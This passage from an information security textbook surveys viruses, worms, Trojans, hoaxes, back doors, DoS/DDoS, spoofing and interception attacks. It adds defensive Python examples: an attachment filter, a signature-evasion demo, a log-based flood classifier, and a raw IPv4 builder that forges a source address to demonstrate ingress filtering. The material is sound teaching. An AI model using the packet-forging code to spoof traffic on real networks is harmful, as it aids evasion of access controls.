Melissa | Macro virus | 1999 | Unknown | $300 million to $600 million
ILOVEYOU | Virus | 2000 | 10% of Internet | $5.5 billion
Klez (and variants) | Virus | 2001 | 7.2% of Internet | $19.8 billion
Code Red (and CR II) | Worm | 2001 | 400,000 servers | $2.6 billion
Nimda | Multivector worm | 2001 | Unknown | Unknown
Sobig F | Worm | 2003 | 1 million | $3 billion
SQL Slammer, a.k.a. Sapphire | Worm | 2003 | 75,000 | $950 million to $1.2 billion
MyDoom | Worm | 2004 | 2 million | $38 billion
Sasser | Worm | 2004 | 500,000 to 700,000 | Unknown
Netsky | Virus | 2004 | Less than 100,000 | Unknown
Storm Worm | Trojan horse virus | 2006 | 10 million | Unknown
Leap-A/Oompa-A | Virus | 2006 | Unknown (Apple) | Unknown
Conficker | Worm | 2009 | 15 million | Unknown
Stuxnet | Worm | 2009 | ~200,000 | Unknown

Viruses
A computer virus consists of code segments (programming instructions) that perform malicious actions. This code behaves much like a virus pathogen that attacks animals and plants, using the cell’s own replication machinery to propagate the attack beyond the initial target. The code attaches itself to an existing program and takes control of the program’s access to the targeted computer. The virus-controlled target program then carries out the virus plan by replicating itself into additional targeted systems. Often, users unwittingly help viruses get into a system. Opening infected e-mail or some other seemingly trivial action can cause anything from random messages appearing on a user’s screen to the destruction of entire hard drives. Just as their namesakes are passed among living bodies, computer viruses are passed from machine to machine via physical media, e-mail, or other forms of computer data transmission. When these viruses infect a machine, they may immediately scan it for e-mail applications or even send themselves to every user in the e-mail address book.

One of the most common methods of virus transmission is via e-mail attachment files. Most organizations block e-mail attachments of certain types and filter all e-mail for known viruses. Years ago, viruses were slow-moving creatures that transferred viral payloads through the cumbersome movement of diskettes from system to system. Now computers are networked, and e-mail programs prove to be fertile ground for computer viruses unless suitable controls are in place. The current software marketplace has several established vendors, such as Symantec Norton AntiVirus, Kaspersky Anti-Virus, AVG AntiVirus, and McAfee VirusScan, which provide applications to help control computer viruses. Microsoft’s Malicious Software Removal Tool is freely available to help users of Windows operating systems remove viruses and other types of malware. Many vendors are moving to software suites that include antivirus applications and provide other malware and nonmalware protection, such as firewall protection programs.

Viruses can be classified by how they spread themselves. Among the most common types of information system viruses are the macro virus, which is embedded in automatically executing macro code used by word processors, spreadsheets, and database applications, and the boot virus, which infects the key operating system files in a computer’s boot sector. Viruses can also be described by how their programming is stored and moved. Some are found as binary executables, including .exe or .com files; as interpretable data files, such as command scripts or a specific application’s document files; or both.

Alternatively, viruses may be classified as memory-resident viruses or non-memory-resident viruses, depending on whether they persist in a computer system’s memory after they have been executed. Resident viruses are capable of reactivating when the computer is booted and continuing their actions until the system is shut down, only to restart the next time the system is booted.

virus: A type of malware that is attached to other executable programs and, when activated, replicates and propagates itself to multiple systems, spreading by multiple communications vectors.

macro virus: A type of virus written in a specific language to target applications that use the language, and activated when the application’s product is opened; typically affects documents, slideshows, e-mails, or spreadsheets created by office suite applications.

boot virus: Also known as a boot sector virus, a type of virus that targets the boot sector or Master Boot Record (MBR) of a computer system’s hard drive or removable storage media.

memory-resident virus: A virus that is capable of installing itself in a computer’s operating system, starting when the computer is activated, and residing in the system’s memory even after the host application is terminated; also known as a resident virus.

non-memory-resident virus: A virus that terminates after it has been activated, infected its host system, and replicated itself; does not reside in an operating system or memory after executing and is also known as a non-resident virus.

In 2002, the author of the Melissa virus, David L. Smith of New Jersey, was convicted in U.S. federal court and sentenced to 20 months in prison, a $5,000 fine, and 100 hours of community service upon release.50

For more information on computer criminals and their crimes and convictions, visit http://en.wikipedia.org and search on “List of Computer Criminals.”
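An added example, not from the textbook, of the attachment blocking the Viruses section describes: a mail-gateway policy filter that parses a message with Python's standard email library and flags attachments by blocked extension, by a double extension such as invoice.pdf.exe, and by content that begins with the MZ header of a DOS/Windows executable regardless of the name it carries. The message, the attachment names (including a stand-in named after the Happy99.exe attachment discussed later in this section) and the payloads are all constructed.

```python
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

# Extensions this constructed policy refuses outright (directly executable on Windows).
BLOCKED_EXTENSIONS = {".exe", ".com", ".scr", ".pif", ".bat", ".cmd",
                      ".vbs", ".js", ".jar", ".msi"}


def classify_attachment(filename, payload: bytes):
    """Return the list of reasons to block this attachment; empty means allowed."""
    reasons = []
    parts = (filename or "").lower().split(".")
    ext = "." + parts[-1] if len(parts) > 1 else ""
    if ext in BLOCKED_EXTENSIONS:
        reasons.append(f"blocked extension {ext}")
        if len(parts) > 2:  # e.g. invoice.pdf.exe: a harmless-looking inner extension
            reasons.append("double extension")
    if payload[:2] == b"MZ":  # DOS/Windows executables start with this header
        reasons.append("DOS/Windows executable header (MZ)")
    return reasons


def scan_message(raw: bytes):
    """Parse an RFC 5322 message and classify every attachment by filename."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    results = {}
    for part in msg.iter_attachments():
        name = part.get_filename()
        payload = part.get_payload(decode=True) or b""
        results[name] = classify_attachment(name, payload)
    return results


def quarantine_list(results):
    """Names of attachments that must be stripped before delivery."""
    return sorted(name for name, reasons in results.items() if reasons)


def build_sample_message() -> bytes:
    """Constructed message with four attachments; none is a real program."""
    msg = EmailMessage()
    msg["From"] = "sender@example.com"
    msg["To"] = "user@example.com"
    msg["Subject"] = "Happy 1999"
    msg.set_content("Open the attachment for a surprise!")
    msg.add_attachment(b"%PDF-1.4 constructed sample", maintype="application",
                       subtype="pdf", filename="report.pdf")
    msg.add_attachment(b"MZ\x90\x00 constructed stand-in, not a real program",
                       maintype="application", subtype="octet-stream",
                       filename="Happy99.exe")
    msg.add_attachment(b"constructed text", maintype="application",
                       subtype="octet-stream", filename="invoice.pdf.exe")
    msg.add_attachment(b"MZ\x90\x00 executable disguised as an image",
                       maintype="image", subtype="jpeg", filename="photo.jpg")
    return msg.as_bytes()


if __name__ == "__main__":
    verdicts = scan_message(build_sample_message())
    for name, reasons in verdicts.items():
        print(f"{name:16s} {'ALLOW' if not reasons else 'BLOCK: ' + '; '.join(reasons)}")
```

The content check matters because a filename is chosen by the sender; photo.jpg is caught only because its bytes say it is an executable.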

Viruses and worms can use several attack vectors to spread copies of themselves to networked peer computers, as illustrated in Table 2-8.

Worms
Named for the tapeworm in John Brunner’s novel The Shockwave Rider, a computer worm can continue replicating itself until it completely fills available resources, such as memory, hard drive space, and network bandwidth. Read the nearby feature about Robert Morris to learn how much damage a worm can cause. Code Red, Sircam, Nimda (“admin” spelled backwards), and Klez are classic examples of a class of worms that combine multiple modes of attack into a single package. Newer malware that includes features of worms and viruses will usually contain multiple exploits that can use any predefined distribution vector to programmatically distribute the worm. (See the description of polymorphic threats later in this section for more details.)

worm: A type of malware that is capable of activation and replication without being attached to an existing program.

Table 2-8 Attack Replication Vectors

Vector | Description
IP scan and attack | The infected system scans a range of IP addresses and service ports and targets several vulnerabilities known to hackers or left over from previous exploits, such as Code Red, Back Orifice, or PoizonBox.
Web browsing | If the infected system has write access to any Web pages, it makes all Web content files infectious, including .html, .asp, .cgi, and other files. Users who browse to those pages infect their machines.
Virus | Each affected machine infects common executable or script files on all computers to which it can write, which spreads the virus code to cause further infection.
Unprotected shares | Using vulnerabilities in file systems and in the way many organizations configure them, the infected machine copies the viral component to all locations it can reach.
Mass mail | By sending e-mail infections to addresses found in the address book, the affected machine infects many other users, whose mail-reading programs automatically run the virus program and infect even more systems.
Simple Network Management Protocol (SNMP) | SNMP is used for remote management of network and computer devices. By using the widely known and common passwords that were employed in early versions of this protocol, the attacking program can gain control of the device. Most vendors have closed these vulnerabilities with software upgrades.

Robert Morris and the Internet Worm51

In November 1988, Robert Morris, Jr. made history. He was a postgraduate student at Cornell who invented a self-propagating program called a worm. He released it onto the Internet, choosing to send it from the Massachusetts Institute of Technology (MIT) to conceal the fact that the worm was designed and created at Cornell. Morris soon discovered that the program was reproducing itself and then infecting other machines at a much greater speed than he had envisaged. The worm had a bug.

Many machines across the United States and the world stopped working or became unresponsive. When Morris realized what was occurring, he reached out for help. He contacted a friend at Harvard, and they sent a message to system administrators at Harvard that described the problem and requested guidance for how to disable the worm. However, because the networks involved were jammed from the worm infection, the message was delayed and had no effect. It was too little too late. Morris’ worm had infected many computers, including those at academic institutions, military sites, and commercial concerns. The cost of the infection and the aftermath was estimated at roughly $200 per site.

The worm that Morris created took advantage of flaws in the sendmail program. These widely known faults allowed debug features to be exploited, but few organizations had taken the trouble to update or patch the flaws. Staff at the University of California, Berkeley and MIT had copies of the program and reverse-engineered them to determine how it functioned. After working nonstop for about 12 hours, the teams of programmers devised a method to slow down the infection. Another method was discovered at Purdue University and widely published. Ironically, the response was hampered by the clogged state of the e-mail infrastructure caused by the worm. After a few days, things slowly started to regain normalcy, and everyone wondered where the worm had originated. Morris was identified as its author in an article in the New York Times, even though his identity was not confirmed at that time.

Morris was convicted under the Computer Fraud and Abuse Act and sentenced to a fine, probation, community service, and court costs. His appeal was rejected in March 1991.

Even though it happened long ago, the outbreak of Nimda in September 2001 still serves as an example of how quickly and widely malware can spread. It used five of the six vectors shown in Table 2-8 to spread itself with startling speed. TruSecure Corporation, an industry source for information security statistics and solutions, reported that Nimda spread across the Internet address space of 14 countries in less than 25 minutes.52

The Klez worm delivered a double-barreled payload: It had an attachment that contained the worm, and if the e-mail was viewed on an HTML-enabled browser, it attempted to deliver a macro virus. News-making attacks, such as MyDoom and Netsky, are variants of the multifaceted attack worms and viruses that exploit weaknesses in leading operating systems and applications.

The complex behavior of worms can be initiated with or without the user downloading or executing the file. Once the worm has infected a computer, it can redistribute itself to all e-mail addresses found on the infected system. Furthermore, a worm can deposit copies of itself onto all Web servers that the infected system can reach; users who subsequently visit those sites become infected. Worms also take advantage of open shares found on the network in which an infected system is located. The worms place working copies of their code onto the server so that users of the open shares are likely to become infected.

In 2003, Jeffrey Lee Parson, an 18-year-old high school student from Minnesota, was arrested for creating and distributing a variant of the Blaster worm called W32.Blaster-B. He was sentenced to 18 months in prison, three years of supervised release, and 100 hours of community service.53 The original Blaster worm was reportedly created by a Chinese hacker group.

Trojan horses are frequently disguised as helpful, interesting, or necessary pieces of software, such as the readme.exe files often included with shareware or freeware packages. Like their namesake in Greek legend, once Trojan horses are brought into a system, they become activated and can wreak havoc on the unsuspecting user. Figure 2-15 outlines a typical Trojan horse attack. Around January 20, 1999, Internet e-mail users began receiving messages with an attachment of a Trojan horse program named Happy99.exe. When the e-mail attachment was opened, a brief multimedia program displayed fireworks and the message “Happy 1999.” While the fireworks display was running, the Trojan horse program was installing itself into the user’s system. The program continued to propagate itself by following up every e-mail the user sent with a second e-mail to the same recipient and with the same attack program attached. A newer variant of the Trojan horse is an attack known as SMiShing, in which the victim is tricked into downloading malware onto a mobile phone via a text message. SMiShing is an abbreviation for SMS phishing.

Trojan horse: A malware program that hides its true nature and reveals its designed behavior only when activated.
way it appears to antivirus software
One of the biggest challenges to fighting viruses and worms has been the emergence of polymorphic threats. A polymorphic threat actually evolves, changing its size and other external file characteristics to elude detection by antivirus software programs.

polymorphic threat: Malware that over time changes the way it appears to antivirus software programs, making it undetectable by techniques that look for preconfigured signatures.
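An added example, not from the textbook, of why a polymorphic variant slips past a preconfigured signature: the known-bad body is wrapped in new padding, so its size and whole-file hash change, while a similarity signature over byte n-grams (a crude stand-in for fuzzy hashing) still recognizes the shared body. The samples are constructed pseudo-random byte strings, not real malware; a genuine polymorphic engine also rewrites the body itself, which is why antivirus vendors layer emulation and behavioral detection on top of such signatures.

```python
import hashlib


def pseudo_bytes(seed: str, size: int) -> bytes:
    """Deterministic filler (a SHA-256 chain): constructed stand-in for a file body."""
    out, block = bytearray(), seed.encode()
    while len(out) < size:
        block = hashlib.sha256(block).digest()
        out.extend(block)
    return bytes(out[:size])


# Constructed corpus: a known-bad body, a variant that keeps the body but changes
# its size and surface (new prefix and suffix), and an unrelated benign file.
KNOWN_BAD = pseudo_bytes("known-bad-sample", 1024)
VARIANT = pseudo_bytes("new-prefix", 200) + KNOWN_BAD + pseudo_bytes("new-suffix", 200)
BENIGN = pseudo_bytes("innocent-document", 1424)


def exact_signature(data: bytes) -> str:
    """A whole-file hash: the classic preconfigured signature."""
    return hashlib.sha256(data).hexdigest()


def ngrams(data: bytes, n: int = 4) -> set:
    """Set of all overlapping n-byte substrings."""
    return {data[i:i + n] for i in range(len(data) - n + 1)}


def similarity(a: bytes, b: bytes, n: int = 4) -> float:
    """Jaccard similarity of byte n-gram sets: 1.0 for identical input,
    near 0.0 for unrelated random data."""
    ga, gb = ngrams(a, n), ngrams(b, n)
    if not ga or not gb:
        return 0.0
    return len(ga & gb) / len(ga | gb)


SIGNATURE_DB = {exact_signature(KNOWN_BAD)}  # what a signature-only scanner knows


def exact_match(data: bytes) -> bool:
    return exact_signature(data) in SIGNATURE_DB


def similarity_match(data: bytes, threshold: float = 0.5) -> bool:
    return similarity(data, KNOWN_BAD) >= threshold


def verdicts():
    """(exact signature hit, similarity hit) for each constructed sample."""
    samples = {"known_bad": KNOWN_BAD, "variant": VARIANT, "benign": BENIGN}
    return {name: (exact_match(d), similarity_match(d)) for name, d in samples.items()}


if __name__ == "__main__":
    for name, (exact, fuzzy) in verdicts().items():
        print(f"{name:10s} exact={exact!s:5s} similarity={fuzzy}")
```

The variant is missed by the exact signature and caught by the similarity measure, while the benign file triggers neither.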

Figure 2-15 Trojan horse attacks: the Trojan horse arrives via e-mail or software such as free games; it is activated when the software or attachment is executed; it then releases its payload, monitors computer activity, installs a back door, or transmits information to the hacker.

As frustrating as viruses and worms are, perhaps more time and money are spent resolving malware hoaxes. Well-meaning people can disrupt the harmony and flow of an organization when they send group e-mails warning of supposedly dangerous viruses that don’t exist. When people fail to follow virus-reporting procedures in response to a hoax, the network becomes overloaded and users waste time and energy forwarding the warning message to everyone they know, posting the message on bulletin boards, and trying to update their antivirus protection software. Some hoaxes are the chain letters or chain e-mails of the day, which are designed to annoy or bemuse the reader. They are known as “weapons of mass distraction.” One of the most prominent virus hoaxes was the 1994 “Goodtimes virus,” which reportedly was transmitted in an e-mail with the header “Good Times” or “goodtimes.”54 The virus never existed, and thousands of hours of employee time were wasted retransmitting the e-mail, effectively creating a denial of service.

At one time, hoaxes amounted to little more than pranks, although occasionally a sting was attached. For example, the Teddy Bear hoax tricked users into deleting necessary operating system files, which made their systems stop working. Recently, criminals have been able to monetize the hoax virus by claiming that systems are infected with malware and then selling a cure for a problem that does not exist. The perpetrator of the hoax may then offer to sell a fake antivirus program to correct the fake malware.

Several Internet resources enable people to research viruses and determine if they are fact or fiction.

malware hoax: A message that reports the presence of nonexistent malware and wastes valuable time as employees share the message.

back door: A malware payload that provides access to a system by bypassing normal access controls or an intentional access control bypass left by a system designer to facilitate development.

trap door: See back door.

For the latest information on virus hoaxes, download the article “Virus Hoaxes—Are They Just a Nuisance?” from www.sans.org/reading-room/whitepapers/malicious/paper/30.

For a more entertaining approach to the latest virus, worm, and hoax information, visit the Hoax-Slayer Web site at www.hoax-slayer.com.

Back Doors
Using a known or newly discovered access mechanism, an attacker can gain access to a system or network resource through a back door. Viruses and worms can have a payload that installs a back door or trap door component in a system, allowing the attacker to access the system at will with special privileges. Examples of such payloads include SubSeven and Back Orifice. Sometimes these doors are left behind by system designers or maintenance staff; such a door is referred to as a maintenance hook.55 More often, attackers place a back door into a system or network they have compromised, making their return to the system that much easier the next time. A trap door is hard to detect because the person or program that places it often makes the access exempt from the system's usual audit logging features and makes every attempt to keep the back door hidden from the system's legitimate owners.

maintenance hook: See back door.

Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
In a denial-of-service (DoS) attack, the attacker sends a large number of connection or information requests to a target (see Figure 2-16). So many requests are made that the target system becomes overloaded and cannot respond to legitimate requests for service. The system may crash or simply become unable to perform ordinary functions. In a distributed denial-of-service (DDoS) attack, a coordinated stream of requests is launched against a target from many locations at the same time. Most DDoS attacks are preceded by a preparation phase in which many systems, perhaps thousands, are compromised. The compromised machines are turned into bots or zombies, machines that are directed remotely by the attacker (usually via a transmitted command) to participate in the attack. DDoS attacks are more difficult to defend against, and no control that the target alone applies is sufficient once the attack traffic exceeds the capacity of its network links; defense depends on upstream filtering or traffic scrubbing by providers, and on cooperative efforts among groups of service providers, such as the "Consensus Roadmap for Defeating Distributed Denial of Service Attacks."56 To use a popular metaphor, DDoS is considered a weapon of mass destruction on the Internet. The MyDoom worm attack in February 2004 was intended to be a DDoS attack against www.sco.com, the Web site of a vendor for a UNIX operating system. Allegedly, the attack was payback for the SCO Group's perceived hostility toward the open-source Linux community.57
Any system connected to the Internet and providing TCP-based network services (such as a Web server, FTP server, or mail server) is vulnerable to DoS attacks. DoS attacks can also be launched against routers or other network server systems if these hosts enable other TCP services, such as echo. Services that run over UDP are no safer: because UDP has no handshake, a request with a forged source address draws a reply many times its own size to the victim, which is the basis of the amplification attacks used in many recent DDoS campaigns.
Prominent in the history of notable DoS attacks are those conducted by Michael Calce (a.k.a. Mafiaboy) on Amazon.com, CNN.com, ETrade.com, ebay.com, Yahoo.com, Excite.com, and Dell.com in February 2000. These software-based attacks lasted approximately four hours and reportedly resulted in millions of dollars in lost revenue.58 The British ISP CloudNine is believed to be the first business "hacked out of existence" by a DoS attack in January 2002. This attack was similar to the DoS attacks launched by Mafiaboy.59 In January 2016, a group calling itself New World Hacking attacked the BBC's Web site. If the scope of the attack is verified, it would qualify as the largest DDoS attack in history up to that time, with an attack rate of 602 Gbps (gigabits per second). The group also hit Donald Trump's campaign Web site on the same day.60 In October 2016, a massive DDoS attack took down several Web sites, including Airbnb, Etsy, GitHub, Netflix, Reddit, Spotify, Twitter, and Vox, by attacking their common DNS service provider, Dyn. While the initial attack lasted only hours, the sites experienced issues for the rest of the day.61

denial-of-service (DoS) attack: An attack that attempts to overwhelm a computer target's ability to handle incoming communications, prohibiting legitimate users from accessing those systems.
distributed denial-of-service (DDoS) attack: A form of attack in which a coordinated stream of requests is launched against a target from multiple locations at the same time using bots or zombies.
bot: An abbreviation of robot, an automated software program that executes certain commands when it receives a specific input; also known as a zombie.
zombie: See bot.
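As an added example (not from the textbook), the following Python script shows the first thing a defender does with the symptom described above: it counts requests per source address in fixed windows over Web server access-log lines and labels a window as a single-source flood (block that address) or a distributed one (per-address blocking will not help). The log lines are constructed, and the window size, capacity figure, thresholds, and addresses are assumptions chosen for the demonstration.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx "combined"-style access log line; only the source address and timestamp are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3})')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Assumed tuning values, not from the textbook: a 10-second window, a server that can
# comfortably serve 100 requests per window, and two rules for labeling a flood.
WINDOW_SECONDS = 10
CAPACITY = 100
SINGLE_SOURCE_SHARE = 0.5      # one address sending at least half of a flood -> DoS
MIN_DISTRIBUTED_SOURCES = 20   # a flood spread over at least this many addresses -> DDoS


def parse_line(line):
    """Return (source_ip, timestamp) or None for a line that does not match the format."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    return m.group("ip"), datetime.strptime(m.group("ts"), TS_FMT)


def window_start(ts):
    """Align a timestamp down to the start of its fixed-size window."""
    offset = ts.timestamp() % WINDOW_SECONDS
    return ts - timedelta(seconds=offset)


def classify_windows(lines):
    """Count requests per source per window and label each window."""
    buckets = defaultdict(Counter)          # window start -> Counter(source ip -> requests)
    for line in lines:
        parsed = parse_line(line)
        if parsed is not None:
            ip, ts = parsed
            buckets[window_start(ts)][ip] += 1

    verdicts = {}
    for start in sorted(buckets):
        counts = buckets[start]
        total = sum(counts.values())
        if total <= CAPACITY:
            verdicts[start] = ("normal", None)
            continue
        top_ip, top_n = counts.most_common(1)[0]
        if top_n / total >= SINGLE_SOURCE_SHARE:
            verdicts[start] = ("dos", top_ip)          # single source: block that address
        elif len(counts) >= MIN_DISTRIBUTED_SOURCES:
            verdicts[start] = ("ddos", len(counts))    # many sources: need upstream help
        else:
            verdicts[start] = ("overload", None)       # busy, but not clearly hostile
    return verdicts


def make_lines(ip, when, count):
    """Constructed log lines (not real traffic): `count` requests from `ip` at time `when`."""
    stamp = when.strftime(TS_FMT)
    return [f'{ip} - - [{stamp}] "GET / HTTP/1.1" 200 512' for _ in range(count)]


T0 = datetime(2016, 10, 21, 11, 10, 0, tzinfo=timezone.utc)
SAMPLE_LOG = (
    make_lines("10.0.0.5", T0, 3)
    + make_lines("10.0.0.6", T0 + timedelta(seconds=4), 2)            # window 0: ordinary load
    + make_lines("198.51.100.7", T0 + timedelta(seconds=10), 150)     # window 1: one host floods
    + make_lines("10.0.0.5", T0 + timedelta(seconds=12), 2)
    + [line for k in range(30)                                        # window 2: 30 bots x 5 each
       for line in make_lines(f"203.0.113.{k}", T0 + timedelta(seconds=20), 5)]
)


def demo():
    """Labels for the three constructed windows, in time order."""
    verdicts = classify_windows(SAMPLE_LOG)
    return [verdicts[T0 + timedelta(seconds=s)] for s in (0, 10, 20)]


if __name__ == "__main__":
    for start, (label, detail) in classify_windows(SAMPLE_LOG).items():
        print(start.strftime("%H:%M:%S"), label, detail if detail is not None else "")
```

The two labels call for different responses: a "dos" verdict names an address a firewall rule can drop, while a "ddos" verdict means the request volume is spread too thinly for address blocking and the organization must lean on its provider or a scrubbing service, which is the point the paragraph above makes.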

In a denial-of-service attack, a hacker compromises a system and uses that system to attack the target computer, flooding it with more requests for services than the target can handle.
In a distributed denial-of-service attack, dozens or even hundreds of computers (known as zombies or bots) are compromised, loaded with DoS attack software, and then remotely activated by the hacker to conduct a coordinated attack.
Figure 2-16 Denial-of-service attacks

E-Mail Attacks
While many consider spam a trivial nuisance rather than an attack, it has been used as a means of enhancing malicious code attacks. In March 2002, there were reports of malicious code embedded in MP3 files that were included as attachments to spam.62 The most significant consequence of spam, however, is the waste of computer and human resources. Many organizations attempt to cope with the flood of spam by using e-mail filtering technologies. Other organizations simply tell users of the mail system to delete unwanted messages.
A form of e-mail attack that is also a DoS attack is called a mail bomb. It can be accomplished using traditional e-mailing techniques or by exploiting various technical flaws in the Simple Mail Transfer Protocol (SMTP). The target of the attack receives an unmanageably large volume of unsolicited e-mail. By sending large e-mails with forged header information, attackers can take advantage of poorly configured e-mail systems on the Internet (for example, open relays, or servers that bounce undeliverable messages back to whatever sender address a message claims) and trick them into sending many e-mails to an address of the attackers' choice. If many such systems are tricked into participating, the target e-mail address is buried under thousands or even millions of unwanted e-mails.
Although phishing attacks also arrive by e-mail, they are better understood as a method of social engineering designed to trick users into performing an action, rather than as a DoS attack that simply makes the user's mailbox the target.

spam: Undesired e-mail, typically commercial advertising transmitted in bulk.
mail bomb: An attack designed to overwhelm the receiver with excessive quantities of e-mail.

Communications Interception Attacks
Common software-based communications attacks include several subcategories designed to intercept and collect information in transit. These types of attacks include sniffers, spoofing, pharming, and man-in-the-middle attacks. The emergence of the Internet of Things (IoT), the addition of communications and interactivity to everyday objects, increases the possibility of these types of attacks. Our automobiles, appliances, and entertainment devices have joined our smartphones in being interconnected and remotely controlled. The security of these devices has not always been a primary concern. IoT devices are now integrated intimately into our everyday lives and are proving to be difficult to secure, because they are often difficult or impossible to update and may not allow embedded passwords to be changed. The use of IoT devices poses significant privacy risks when they cannot be properly secured.
A packet sniffer (or simply sniffer) can monitor data traveling over a network. Sniffers can be used both for legitimate network management functions and for stealing information. Unauthorized sniffers can be extremely dangerous to a network's security because a purely passive sniffer transmits nothing and is therefore very hard to detect from elsewhere on the network, and one can be inserted almost anywhere. This feature makes them a favorite weapon in the hacker's arsenal. Sniffers often work on TCP/IP networks. Sniffers add risk to network communications because many systems and users send information on local networks in clear text. A sniffer program shows all the data going by, including passwords, the data inside files (such as word-processing documents), and sensitive data from applications.
Attackers want to mask their sources, so they frequently use some sort of spoofing to hide themselves. In IP spoofing, hackers use a variety of techniques to obtain trusted IP addresses and then modify packet headers (see Figure 2-17) to insert these forged addresses. Newer routers and firewall arrangements can offer protection against IP spoofing; the basic control is ingress and egress filtering, which drops a packet arriving on an outside interface whose source address belongs to the inside network and, symmetrically, an outbound packet whose source address is not one of the organization's own.

packet sniffer: A software program or hardware appliance that can intercept, copy, and interpret network traffic.
sniffer: See packet sniffer.
spoofing: The use of a communications identifier, such as a phone number, network address, or e-mail address, that is not accurately assigned to the source.
IP spoofing: A technique for gaining unauthorized access to computers using a forged or modified source IP address to give the perception that messages are coming from a trusted host.

Original IP packet from hacker's system: IP source 192.168.0.25, IP destination 10.0.0.75, data: payload.
Spoofed (modified) IP packet: IP source 10.0.0.80, IP destination 10.0.0.75, data: payload. The hacker modifies the source address to spoof the firewall.
The firewall allows the packet in, mistaking it for legitimate traffic, and the spoofed packet slips into the intranet to wreak havoc.
Figure 2-17 IP spoofing attack
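The packet manipulation in Figure 2-17 and the filtering that defeats it, as an added example that is not part of the textbook: a Python script that builds and parses raw IPv4 headers (including the RFC 791 header checksum) and applies the figure's trust-by-source-address rule with and without BCP 38-style ingress/egress filtering. The intranet range 10.0.0.0/8, the two-interface firewall model, and the packets themselves are assumptions constructed for the demonstration; under them the hacker's own address 192.168.0.25 counts as an outside host.

```python
import ipaddress
import struct

# Assumed network layout for the example: the intranet behind the firewall is 10.0.0.0/8.
INSIDE = ipaddress.ip_network("10.0.0.0/8")
HEADER_FMT = "!BBHHHBBH4s4s"   # fixed 20-byte IPv4 header without options


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 header checksum: one's-complement sum of 16-bit words, then complemented."""
    total = 0
    for i in range(0, len(header), 2):
        total += (header[i] << 8) | header[i + 1]
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4_packet(src: str, dst: str, payload: bytes, proto: int = 6, ttl: int = 64) -> bytes:
    """Assemble a minimal IPv4 packet; a spoofing tool does exactly this with a forged `src`."""
    fields = [0x45, 0, 20 + len(payload), 0, 0, ttl, proto, 0,
              ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed]
    header = struct.pack(HEADER_FMT, *fields)
    fields[7] = ipv4_checksum(header)          # fill in the checksum computed over a zeroed field
    return struct.pack(HEADER_FMT, *fields) + payload


def parse_ipv4_header(packet: bytes):
    """Return (src, dst, proto, ttl, payload); raise ValueError on malformed input."""
    if len(packet) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, _total_len, _ident, _frag, ttl, proto, _csum, src, dst = struct.unpack(HEADER_FMT, packet[:20])
    version, ihl = ver_ihl >> 4, ver_ihl & 0x0F
    if version != 4 or ihl < 5 or len(packet) < ihl * 4:
        raise ValueError("not a well-formed IPv4 header")
    if ipv4_checksum(packet[:ihl * 4]) != 0:   # a header with a correct checksum sums to zero
        raise ValueError("bad header checksum")
    return (ipaddress.IPv4Address(src), ipaddress.IPv4Address(dst), proto, ttl, packet[ihl * 4:])


def firewall_decision(packet: bytes, arrived_on_outside: bool, antispoof: bool) -> str:
    """The figure's address-based trust rule, with and without ingress/egress filtering."""
    src, _dst, _proto, _ttl, _payload = parse_ipv4_header(packet)
    if antispoof:
        if arrived_on_outside and src in INSIDE:
            return "DROP"          # outside packet claiming an inside source
        if not arrived_on_outside and src not in INSIDE:
            return "DROP"          # inside packet with a foreign source: do not be a spoofing source
    return "TRUSTED" if src in INSIDE else "UNTRUSTED"


def demo():
    spoofed = build_ipv4_packet("10.0.0.80", "10.0.0.75", b"payload")    # hacker forges an inside source
    honest = build_ipv4_packet("192.168.0.25", "10.0.0.75", b"payload")
    return (firewall_decision(spoofed, True, antispoof=False),   # Figure 2-17 outcome
            firewall_decision(spoofed, True, antispoof=True),
            firewall_decision(honest, True, antispoof=True))


if __name__ == "__main__":
    print(demo())
```

The first result reproduces the figure (the forged packet is trusted because trust is keyed on a header field the sender controls); the second shows the same packet dropped once the firewall asks whether that source address could legitimately arrive on that interface. Note what the filter cannot do: it cannot catch a forged source that is plausible for the interface it arrives on, which is why address-based trust should be backed by authentication rather than replaced by filtering alone.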

Pharming attacks often use Trojans, worms, or other virus technologies to attack an Internet browser's address bar so that the valid URL the user types is modified to that of an illegitimate Web site. A form of pharming called Domain Name System (DNS) cache poisoning targets the Internet DNS system, corrupting the cached answers a resolver holds so that a legitimate name resolves to the attacker's address. The key difference between pharming and phishing is that the latter requires the user to actively click a link or button to be redirected to the illegitimate site, whereas pharming attacks modify the user's traffic without the user's knowledge or active participation.
In the well-known man-in-the-middle attack, an attacker monitors (or sniffs) packets from the network, modifies them, and inserts them back into the network. In a TCP hijacking attack, also known as session hijacking, the attacker uses address spoofing to impersonate other legitimate entities on the network. It allows the attacker to eavesdrop as well as to change, delete, reroute, add, forge, or divert data. A variant of TCP hijacking involves the interception of an encryption key exchange, which enables the hacker to act as an invisible man in the middle, that is, an eavesdropper, on encrypted communications. Figure 2-18 illustrates these attacks by showing how a hacker uses public and private encryption keys to intercept messages. An unauthenticated key exchange is what makes this possible: if each party cannot verify that the public key it receives really belongs to the other party (for example, through a certificate issued by a trusted authority), it has no way to tell the attacker's key from the genuine one. You will learn more about encryption keys in Module 10.

pharming: The redirection of legitimate user Web traffic to illegitimate Web sites with the intent to collect personal information.
Domain Name System (DNS) cache poisoning: The intentional hacking and modification of a DNS database to redirect legitimate traffic to illegitimate Internet locations; also known as DNS spoofing.
man-in-the-middle: A group of attacks whereby a person intercepts a communications stream and inserts himself in the conversation to convince each of the legitimate parties that he is the other communications partner; some of these attacks involve encryption functions.
TCP hijacking: A form of man-in-the-middle attack whereby the attacker inserts himself into TCP/IP-based communications.
session hijacking: See TCP hijacking.

Technical Hardware Failures or Errors
